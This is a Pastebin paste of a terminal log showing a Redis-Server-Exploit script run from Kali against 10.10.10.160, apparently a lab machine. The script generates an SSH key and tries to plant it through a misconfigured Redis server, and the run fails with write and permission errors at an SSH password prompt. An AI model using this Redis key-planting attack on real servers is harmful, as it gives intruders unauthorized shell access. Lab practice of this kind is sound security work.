Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@kali:~/Downloads/Redis-Server-Exploit# ./redis.py 10.10.10.160 redis
- *******************************************************************
- * [+] [Exploit] Exploiting misconfigured REDIS SERVER*
- * [+] AVINASH KUMAR THAPA aka "-Acid"
- *******************************************************************
- SSH Keys Need to be Generated
- Generating public/private rsa key pair.
- Enter file in which to save the key (/root/.ssh/id_rsa): /root/Downloads/key
- Enter passphrase (empty for no passphrase):
- Enter same passphrase again:
- Your identification has been saved in /root/Downloads/key.
- Your public key has been saved in /root/Downloads/key.pub.
- The key fingerprint is:
- SHA256:Z06l//oIsuXO9RkGm60x/bcVJgo5s9pw1GLguNL097E acid_creative
- The key's randomart image is:
- +---[RSA 3072]----+
- | |
- | |
- | . . |
- | o . oo |
- | o .SO=... o |
- | o o o=*..*o .|
- | . o o.++oB = .|
- | . **.ooO +o|
- | ..o+E+o=.+|
- +----[SHA256]-----+
- Keys Generated Successfully
- sh: 1: cannot create /root/.ssh/public_key.txt: Directory nonexistent
- (error) MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the data set are disabled, because this instance is configured to report errors during writes if RDB snapshotting fails (stop-writes-on-bgsave-error option). Please check the Redis logs for details about the RDB error.
- cat: /root/.ssh/public_key.txt: No such file or directory
- (error) MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the data set are disabled, because this instance is configured to report errors during writes if RDB snapshotting fails (stop-writes-on-bgsave-error option). Please check the Redis logs for details about the RDB error.
- OK
- (error) ERR Changing directory: Permission denied
- OK
- (error) ERR
- You'll get shell in sometime..Thanks for your patience
- Warning: Identity file /root/.ssh/id_rsa not accessible: No such file or directory.
- The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
- ECDSA key fingerprint is SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0.
- Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
- Warning: Permanently added '10.10.10.160' (ECDSA) to the list of known hosts.
- redis@10.10.10.160's password:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement